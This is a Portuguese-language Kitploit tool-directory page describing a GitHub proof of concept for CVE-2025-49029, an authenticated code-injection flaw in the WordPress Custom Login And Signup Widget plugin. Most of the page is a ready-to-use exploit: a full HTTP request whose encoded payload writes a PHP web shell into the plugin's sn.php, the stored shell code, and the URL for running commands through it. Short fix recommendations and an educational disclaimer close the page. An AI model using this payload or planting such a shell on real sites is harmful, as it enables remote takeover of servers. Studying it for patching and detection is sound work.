Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-49029 — WordPress Custom Login And Signup Widget Plugin <= 1.0 é vulnerável a Execução Arbitrária de Código | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-49029
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-49029

CVE-2025-49029

WordPress Custom Login And Signup Widget Plugin <= 1.0 é vulnerável a Execução Arbitrária de Código

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 Plugin WordPress Custom Login And Signup Widget <= 1.0 - Execução Arbitrária de Código (RCE)

🐞 Resumo da Vulnerabilidade

A vulnerabilidade Controle Incorreto da Geração de Código ('Injeção de Código') em bitto.Kazi Custom Login And Signup Widget permite que usuários administradores autenticados executem código PHP arbitrário.
Este problema afeta todas as versões até a 1.0 inclusive.

🔥 Pontuação Base: 9.1 (CRÍTICO)
ID CWE: CWE-94 – Controle Incorreto da Geração de Código ('Injeção de Código')


🧠 Descrição

O plugin permite que administradores modifiquem o conteúdo de sn.php por meio do campo Nome do Remetente na página de configurações.
A entrada fornecida pelo usuário é gravada diretamente em um arquivo PHP sem sanitização ou validação.

Como resultado, qualquer código PHP fornecido no parâmetro text será armazenado dentro de um arquivo PHP e executado mediante requisição direta, levando à .

execução remota de código (RCE)

📍 Endpoint Vulnerável

root@kitploit:~
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes

📥 Requisição (Formato Burp Suite)

root@kitploit:~
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i

text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

💉 Ponto de Injeção

  • Parâmetro: text
  • Tipo: POST
  • Função necessária: Administrador
  • Arquivo afetado: sn.php (include de configuração do plugin)

🧬 Conteúdo Injetado Armazenado no Arquivo

root@kitploit:~
<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>

📁 Arquivo Gravado Em:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php

Após a injeção bem-sucedida, acesse-o diretamente para executar comandos via:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id

🛡️ Recomendações

  • Restrinja operações de gravação em arquivos.
  • Sanitize e valide todas as entradas antes de gravar em arquivos PHP.
  • Nunca permita que conteúdo dinâmico seja gravado em arquivos .php.

⚠️ Aviso Legal

Este projeto foi criado apenas para fins educacionais e de pesquisa.
Qualquer uso das informações fornecidas é por sua conta e risco.
O autor não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por este conteúdo.


✍️ Por: Khaled_Alenazi (Nxploited)

Baixar ferramenta